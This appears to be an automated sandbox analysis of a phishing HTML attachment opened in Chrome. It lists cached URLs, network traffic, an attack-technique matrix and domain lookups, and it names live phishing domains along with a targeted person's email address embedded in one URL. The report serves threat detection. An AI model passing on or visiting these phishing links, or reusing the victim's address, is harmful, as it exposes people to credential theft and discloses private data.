Source: chromecache_303.2.dr, chromecache_214.2.drString found in binary or memory: https://content.powerapps.com/resource/powerbiwfe/styles/powerbi.min.56ad1156c9c0457aab81.css
Source: chromecache_303.2.dr, chromecache_214.2.drString found in binary or memory: https://content.powerapps.com/resource/powerbiwfe/styles/powerbi.web.externals.min.3ff78e9b733c085e2
Source: chromecache_303.2.dr, chromecache_214.2.drString found in binary or memory: https://content.powerapps.com/resource/powerbiwfe/styles/styleLibrary.min.b5805e246773b8da3fc2.css
Source: chromecache_303.2.dr, chromecache_214.2.drString found in binary or memory: https://content.powerapps.com/resource/powerbiwfe/styles/visuals.min.4a1a13972da0a85c167f.css
Source: chromecache_334.2.dr, chromecache_330.2.drString found in binary or memory: https://dc-int.services.visualstudio.com
Source: chromecache_334.2.dr, chromecache_330.2.drString found in binary or memory: https://dc.services.visualstudio.com
Source: chromecache_206.2.drString found in binary or memory: https://dev.azure.com/mscomdev/Moray/_workitems/edit/4494
Source: chromecache_228.2.dr, chromecache_219.2.drString found in binary or memory: https://dev.azure.com/powerbi/PowerBIClients/_git/PowerBIClients/pullrequest/131629)
Source: chromecache_205.2.dr, chromecache_206.2.drString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/KeyboardEvent/key/Key_Values
Source: chromecache_303.2.dr, chromecache_214.2.drString found in binary or memory: https://eastus-8.in.applicationinsights.azure.com/
Source: chromecache_205.2.dr, chromecache_206.2.drString found in binary or memory: https://elad.medium.com/css-position-sticky-how-it-really-works-54cd01dc2d46
Source: chromecache_213.2.dr, chromecache_324.2.drString found in binary or memory: https://github.com/axios/axios.git
Source: chromecache_213.2.dr, chromecache_324.2.drString found in binary or memory: https://github.com/axios/axios/issues
Source: chromecache_182.2.dr, chromecache_294.2.drString found in binary or memory: https://github.com/carhartl/jquery-cookie
Source: chromecache_228.2.dr, chromecache_219.2.drString found in binary or memory: https://github.com/gromo/jquery.scrollbar/
Source: chromecache_228.2.dr, chromecache_219.2.drString found in binary or memory: https://github.com/imakewebthings/waypoints/blog/master/licenses.txt
Source: chromecache_228.2.dr, chromecache_219.2.drString found in binary or memory: https://github.com/jquery/PEP
Source: chromecache_308.2.drString found in binary or memory: https://github.com/microsoft/BotFramework-WebChat/issues/2119
Source: chromecache_205.2.dr, chromecache_206.2.drString found in binary or memory: https://github.com/mozilla/rhino/issues/346
Source: chromecache_280.2.dr, chromecache_291.2.drString found in binary or memory: https://github.com/nevware21/ts-async
Source: chromecache_228.2.dr, chromecache_219.2.drString found in binary or memory: https://github.com/requirejs/requirejs/blob/master/LICENSE
Source: chromecache_320.2.drString found in binary or memory: https://github.com/scottjehl/picturefill/blob/master/Authors.txt;
Source: chromecache_268.2.dr, chromecache_320.2.drString found in binary or memory: https://github.com/scottjehl/picturefill/tree/3.0/src/plugins/gecko-picture
Source: chromecache_205.2.dr, chromecache_206.2.drString found in binary or memory: https://github.com/tc39/proposal-error-cause
Source: chromecache_205.2.dr, chromecache_206.2.drString found in binary or memory: https://github.com/w3c/aria-practices/pull/1757
Source: chromecache_205.2.dr, chromecache_206.2.dr, chromecache_267.2.dr, chromecache_314.2.drString found in binary or memory: https://github.com/zloirock/core-js
Source: chromecache_205.2.dr, chromecache_206.2.drString found in binary or memory: https://github.com/zloirock/core-js/blob/v3.25.0/LICENSE
Source: chromecache_267.2.dr, chromecache_314.2.drString found in binary or memory: https://github.com/zloirock/core-js/blob/v3.30.1/LICENSE
Source: chromecache_205.2.dr, chromecache_206.2.drString found in binary or memory: https://github.com/zloirock/core-js/issues/86#issuecomment-115759028
Source: chromecache_188.2.dr, chromecache_250.2.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1MmB8?ver=6c43g
Source: chromecache_228.2.dr, chromecache_219.2.drString found in binary or memory: https://itunes.apple.com/
Source: chromecache_205.2.dr, chromecache_206.2.drString found in binary or memory: https://javascript.info/size-and-scroll-window#width-height-of-the-document
Source: chromecache_311.2.dr, chromecache_343.2.drString found in binary or memory: https://jquery.com/
Source: chromecache_311.2.dr, chromecache_343.2.drString found in binary or memory: https://jquery.org/license
Source: chromecache_311.2.dr, chromecache_343.2.drString found in binary or memory: https://js.foundation/
Source: chromecache_205.2.dr, chromecache_206.2.drString found in binary or memory: https://keycode.info/table-of-all-keycodes
Source: chromecache_257.2.dr, chromecache_297.2.dr, chromecache_228.2.dr, chromecache_219.2.drString found in binary or memory: https://lodash.com/
Source: chromecache_257.2.dr, chromecache_297.2.dr, chromecache_228.2.dr, chromecache_219.2.drString found in binary or memory: https://lodash.com/license
Source: chromecache_353.2.dr, chromecache_239.2.drString found in binary or memory: https://login.live.com/Me.srf?wa
Source: chromecache_353.2.dr, chromecache_239.2.drString found in binary or memory: https://login.microsoftonline.com/forgetuser
Source: chromecache_353.2.dr, chromecache_239.2.drString found in binary or memory: https://login.microsoftonline.com/savedusers?appid
Source: chromecache_239.2.drString found in binary or memory: https://login.microsoftonline.com/uxlogout?appid
Source: chromecache_213.2.dr, chromecache_324.2.drString found in binary or memory: https://microsoftit.pkgs.visualstudio.com/OneITVSO/_packaging/CSM-SITES-AEMFoundations/npm/registry/
Source: chromecache_173.2.dr, chromecache_271.2.drString found in binary or memory: https://msonecloudapifd-c7cndkdmc9c3d7e3.z01.azurefd.net
Source: chromecache_173.2.dr, chromecache_271.2.drString found in binary or memory: https://msonecloudapifd-nonprod-adg7arhndebhe8hd.z01.azurefd.net
Source: chromecache_303.2.dr, chromecache_214.2.drString found in binary or memory: https://neu.rmm.api.prd.trafficmanager.net/api/v1
Source: chromecache_257.2.dr, chromecache_297.2.dr, chromecache_228.2.dr, chromecache_219.2.drString found in binary or memory: https://npms.io/search?q=ponyfill.
Source: chromecache_257.2.dr, chromecache_297.2.dr, chromecache_228.2.dr, chromecache_219.2.drString found in binary or memory: https://openjsf.org/
Source: chromecache_317.2.drString found in binary or memory: https://outlook-sdf.live.com/mail/
Source: chromecache_188.2.dr, chromecache_250.2.drString found in binary or memory: https://outlook.live.com/owa/?nlp=1
Source: chromecache_303.2.dr, chromecache_214.2.drString found in binary or memory: https://pbiadx.powerbi.com
Source: chromecache_303.2.dr, chromecache_214.2.drString found in binary or memory: https://pbides.powerbi.com
Source: chromecache_303.2.dr, chromecache_214.2.drString found in binary or memory: https://pbidfw.powerbi.com
Source: chromecache_303.2.dr, chromecache_214.2.drString found in binary or memory: https://pbidpe.powerbi.com
Source: chromecache_303.2.dr, chromecache_214.2.drString found in binary or memory: https://pbilhe.powerbi.com
Source: chromecache_303.2.dr, chromecache_214.2.drString found in binary or memory: https://pbirfx.powerbi.com
Source: chromecache_303.2.dr, chromecache_214.2.drString found in binary or memory: https://pbispc.powerbi.com
Source: chromecache_303.2.dr, chromecache_214.2.drString found in binary or memory: https://pbistm.powerbi.com
Source: chromecache_303.2.dr, chromecache_214.2.drString found in binary or memory: https://pbivisuals.powerbi.com
Source: chromecache_202.2.drString found in binary or memory: https://play.vidyard.com/embed/v4.js
Source: chromecache_303.2.dr, chromecache_214.2.drString found in binary or memory: https://playground.powerbi.com/
Source: chromecache_303.2.dr, chromecache_214.2.drString found in binary or memory: https://portal.office.com
Source: chromecache_303.2.dr, chromecache_214.2.drString found in binary or memory: https://portal.office.com/adminportal/home#/catalog
Source: chromecache_228.2.dr, chromecache_219.2.drString found in binary or memory: https://raw.github.com/taye/interact.js/master/LICENSE
Source: chromecache_268.2.dr, chromecache_320.2.drString found in binary or memory: https://scottjehl.github.io/picturefill/
Source: chromecache_311.2.dr, chromecache_343.2.drString found in binary or memory: https://sizzlejs.com/
Source: chromecache_303.2.dr, chromecache_214.2.drString found in binary or memory: https://support.powerbi.com
Source: chromecache_205.2.dr, chromecache_206.2.drString found in binary or memory: https://tc39.es/ecma262/#sec-IsHTMLDDA-internal-slot
Source: chromecache_205.2.dr, chromecache_206.2.drString found in binary or memory: https://tc39.es/ecma262/#sec-IsHTMLDDA-internal-slot-aec
Source: chromecache_205.2.dr, chromecache_206.2.drString found in binary or memory: https://tc39.es/ecma262/#sec-array.prototype.includes
Source: chromecache_205.2.dr, chromecache_206.2.drString found in binary or memory: https://tc39.es/ecma262/#sec-array.prototype.indexof
Source: chromecache_205.2.dr, chromecache_206.2.drString found in binary or memory: https://tc39.es/ecma262/#sec-getmethod
Source: chromecache_205.2.dr, chromecache_206.2.drString found in binary or memory: https://tc39.es/ecma262/#sec-hasownproperty
Source: chromecache_205.2.dr, chromecache_206.2.drString found in binary or memory: https://tc39.es/ecma262/#sec-iscallable
Source: chromecache_205.2.dr, chromecache_206.2.drString found in binary or memory: https://tc39.es/ecma262/#sec-lengthofarraylike
Source: chromecache_205.2.dr, chromecache_206.2.drString found in binary or memory: https://tc39.es/ecma262/#sec-math.trunc
Source: chromecache_205.2.dr, chromecache_206.2.drString found in binary or memory: https://tc39.es/ecma262/#sec-object.defineproperty
Source: chromecache_205.2.dr, chromecache_206.2.drString found in binary or memory: https://tc39.es/ecma262/#sec-object.getownpropertydescriptor
Source: chromecache_205.2.dr, chromecache_206.2.drString found in binary or memory: https://tc39.es/ecma262/#sec-object.getownpropertynames
Source: chromecache_205.2.dr, chromecache_206.2.drString found in binary or memory: https://tc39.es/ecma262/#sec-object.prototype.propertyisenumerable
Source: chromecache_205.2.dr, chromecache_206.2.drString found in binary or memory: https://tc39.es/ecma262/#sec-object.setprototypeof
Source: chromecache_205.2.dr, chromecache_206.2.drString found in binary or memory: https://tc39.es/ecma262/#sec-ordinarytoprimitive
Source: chromecache_205.2.dr, chromecache_206.2.drString found in binary or memory: https://tc39.es/ecma262/#sec-requireobjectcoercible
Source: chromecache_205.2.dr, chromecache_206.2.drString found in binary or memory: https://tc39.es/ecma262/#sec-tointegerorinfinity
Source: chromecache_205.2.dr, chromecache_206.2.drString found in binary or memory: https://tc39.es/ecma262/#sec-tolength
Source: chromecache_205.2.dr, chromecache_206.2.drString found in binary or memory: https://tc39.es/ecma262/#sec-toobject
Source: chromecache_205.2.dr, chromecache_206.2.drString found in binary or memory: https://tc39.es/ecma262/#sec-toprimitive
Source: chromecache_205.2.dr, chromecache_206.2.drString found in binary or memory: https://tc39.es/ecma262/#sec-topropertykey
Source: chromecache_205.2.dr, chromecache_206.2.drString found in binary or memory: https://tc39.es/proposal-error-cause/#sec-errorobjects-install-error-cause
Source: chromecache_303.2.dr, chromecache_214.2.drString found in binary or memory: https://world.ces.microsoftcloud.com
Source: chromecache_202.2.drString found in binary or memory: https://www.skype.com/en/
Source: chromecache_202.2.drString found in binary or memory: https://www.xbox.com/
Source: chromecache_202.2.drString found in binary or memory: https://www.xbox.com/en-us/games/store/pc-game-pass/cfq7ttc0kgq8?icid=CNavAllPCGamePass
Source: chromecache_202.2.drString found in binary or memory: https://www.xbox.com/en-us/games/store/xbox-game-pass-ultimate/cfq7ttc0khs0?icid=CNavAllXboxGamePass
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 50144 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50144
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50273
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50093
Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50273 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789

System Summary

barindex
Source: Name includes: REMITTANCE_10023Tdcj.htmlInitial sample: remit
Source: classification engineClassification label: mal76.phis.evad.winHTML@30/294@61/15
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\REMITTANCE_10023Tdcj.html"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=2028,i,13264855427996641456,9624318875190211204,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=2028,i,13264855427996641456,9624318875190211204,262144 /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected

Data Obfuscation

barindex
Source: https://21.zomelore.ru/rwDHrVWE/#O#Falicia.duke@tdcj.texas.govHTTP Parser: https://21.zomelore.ru/rwDHrVWE/#O#Falicia.duke@tdcj.texas.gov
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
1
Drive-by Compromise
Windows Management Instrumentation1
Browser Extensions
1
Process Injection
1
Process Injection
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Scripting
Boot or Logon Initialization Scripts1
Deobfuscate/Decode Files or Information
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://tc39.es/ecma262/#sec-toobject0%Avira URL Cloudsafe
https://pbiadx.powerbi.com0%Avira URL Cloudsafe
https://tc39.es/ecma262/#sec-object.prototype.propertyisenumerable0%Avira URL Cloudsafe
https://tc39.es/ecma262/#sec-hasownproperty0%Avira URL Cloudsafe
https://tc39.es/ecma262/#sec-object.getownpropertydescriptor0%Avira URL Cloudsafe
https://axios-http.com0%Avira URL Cloudsafe
https://tc39.es/ecma262/#sec-requireobjectcoercible0%Avira URL Cloudsafe
https://tc39.es/ecma262/#sec-object.setprototypeof0%Avira URL Cloudsafe
https://tc39.es/ecma262/#sec-tointegerorinfinity0%Avira URL Cloudsafe
http://jscompress.com/0%Avira URL Cloudsafe
https://keycode.info/table-of-all-keycodes0%Avira URL Cloudsafe
https://elad.medium.com/css-position-sticky-how-it-really-works-54cd01dc2d460%Avira URL Cloudsafe
https://outlook-sdf.live.com/mail/0%Avira URL Cloudsafe
https://bugzil.la/5483970%Avira URL Cloudsafe
https://tc39.es/ecma262/#sec-tolength0%Avira URL Cloudsafe
https://tc39.es/ecma262/#sec-getmethod0%Avira URL Cloudsafe
https://mbigqvptso9zh4kbsf1xwmhkf9pcroq3g0vbws0rgv5970xbtzluqzxc.bfcgpixdwnw.ru/injqzmaorhcfcmoaukflhkifyNZxGCKNYHHPPVNBFPELBOVUYIFNOCEPIRMUSC100%Avira URL Cloudmalware
https://app.pbiwebcontent.com/webcontentsandbox.html0%Avira URL Cloudsafe
https://msonecloudapifd-c7cndkdmc9c3d7e3.z01.azurefd.net0%Avira URL Cloudsafe
https://playground.powerbi.com/0%Avira URL Cloudsafe
https://tc39.es/ecma262/#sec-lengthofarraylike0%Avira URL Cloudsafe
https://tc39.es/ecma262/#sec-IsHTMLDDA-internal-slot-aec0%Avira URL Cloudsafe
https://tc39.es/ecma262/#sec-iscallable0%Avira URL Cloudsafe
http://scottjehl.github.io/picturefill0%Avira URL Cloudsafe
https://tc39.es/ecma262/#sec-object.defineproperty0%Avira URL Cloudsafe
https://pbispc.powerbi.com0%Avira URL Cloudsafe
https://microsoftit.pkgs.visualstudio.com/OneITVSO/_packaging/CSM-SITES-AEMFoundations/npm/registry/0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
a.nel.cloudflare.com
35.190.80.1
truefalse
    high
    code.jquery.com
    151.101.66.137
    truefalse
      high
      cdnjs.cloudflare.com
      104.17.24.14
      truefalse
        high
        mbigqvptso9zh4kbsf1xwmhkf9pcroq3g0vbws0rgv5970xbtzluqzxc.bfcgpixdwnw.ru
        172.67.189.38
        truefalse
          unknown
          challenges.cloudflare.com
          104.18.95.41
          truefalse
            high
            bookworkstudio.net
            69.49.245.172
            truefalse
              high
              www.google.com
              142.250.181.100
              truefalse
                high
                s-part-0035.t-0009.t-msedge.net
                13.107.246.63
                truefalse
                  high
                  waws-prod-dxb-b24c6da5.sip.p.azurewebsites.windows.net
                  20.38.136.70
                  truefalse
                    unknown
                    21.zomelore.ru
                    104.21.73.64
                    truetrue
                      unknown
                      app.powerbi.com
                      unknown
                      unknownfalse
                        high
                        api.powerbi.com
                        unknown
                        unknownfalse
                          high
                          play.vidyard.com
                          unknown
                          unknownfalse
                            high
                            content.powerapps.com
                            unknown
                            unknownfalse
                              high
                              dc.services.visualstudio.com
                              unknown
                              unknownfalse
                                high
                                cdn.botframework.com
                                unknown
                                unknownfalse
                                  high
                                  login.microsoftonline.com
                                  unknown
                                  unknownfalse
                                    high
                                    NameMaliciousAntivirus DetectionReputation
                                    https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                      high
                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8f0940fe6c4f4373&lang=autofalse
                                        high
                                        https://app.powerbi.com/?pbi_source=websignup_uNavfalse
                                          high
                                          https://challenges.cloudflare.com/turnstile/v0/g/f9063374b04d/api.jsfalse
                                            high
                                            https://app.powerbi.com/favicon.icofalse
                                              high
                                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/flow/ov1/2052973775:1733955903:mwgDOxztvG-5XDI8u3krRI0LqZnjx6ACV_1HL3xWCHg/8f0940fe6c4f4373/CVmrfugbA_zqktzvG3JcRgs_mC_rv53iYzPMW._IILw-1733959736-1.1.1.1-UvbuVkQKEJNelwu1lbxWxXa26svM2baBo3khA2S2NQujCVwstPaAd55J9oE_yBaLfalse
                                                high
                                                https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                                  high
                                                  https://21.zomelore.ru/rwDHrVWE/#O#Falicia.duke@tdcj.texas.govtrue
                                                    unknown
                                                    https://mbigqvptso9zh4kbsf1xwmhkf9pcroq3g0vbws0rgv5970xbtzluqzxc.bfcgpixdwnw.ru/injqzmaorhcfcmoaukflhkifyNZxGCKNYHHPPVNBFPELBOVUYIFNOCEPIRMUSCfalse
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1false
                                                      high
                                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/pat/8f0940fe6c4f4373/1733959740238/e4911a032d42c9b8fd75eecc8cc040b583fab29ebc575e2b46036d09e5d291e6/mvbqwLy3Iwfs6lPfalse
                                                        high
                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                        https://github.com/mozilla/rhino/issues/346chromecache_205.2.dr, chromecache_206.2.drfalse
                                                          high
                                                          https://login.microsoftonline.com/uxlogout?appidchromecache_239.2.drfalse
                                                            high
                                                            https://tc39.es/ecma262/#sec-toobjectchromecache_205.2.dr, chromecache_206.2.drfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://aka.ms/PBI_Comm_Overviewchromecache_202.2.drfalse
                                                              high
                                                              https://github.com/carhartl/jquery-cookiechromecache_182.2.dr, chromecache_294.2.drfalse
                                                                high
                                                                https://content.powerapps.com/resource/powerbiwfe/styles/styleLibrary.min.b5805e246773b8da3fc2.csschromecache_303.2.dr, chromecache_214.2.drfalse
                                                                  high
                                                                  https://content.powerapps.com/resource/powerbiwfe/scripts/lodash.bundle.min.1f04f34657610a03812a.jschromecache_303.2.dr, chromecache_214.2.drfalse
                                                                    high
                                                                    https://tc39.es/ecma262/#sec-object.getownpropertydescriptorchromecache_205.2.dr, chromecache_206.2.drfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://github.com/zloirock/core-jschromecache_205.2.dr, chromecache_206.2.dr, chromecache_267.2.dr, chromecache_314.2.drfalse
                                                                      high
                                                                      https://www.xbox.com/en-us/games/store/pc-game-pass/cfq7ttc0kgq8?icid=CNavAllPCGamePasschromecache_202.2.drfalse
                                                                        high
                                                                        https://login.microsoftonline.com/savedusers?appidchromecache_353.2.dr, chromecache_239.2.drfalse
                                                                          high
                                                                          https://tc39.es/ecma262/#sec-object.prototype.propertyisenumerablechromecache_205.2.dr, chromecache_206.2.drfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
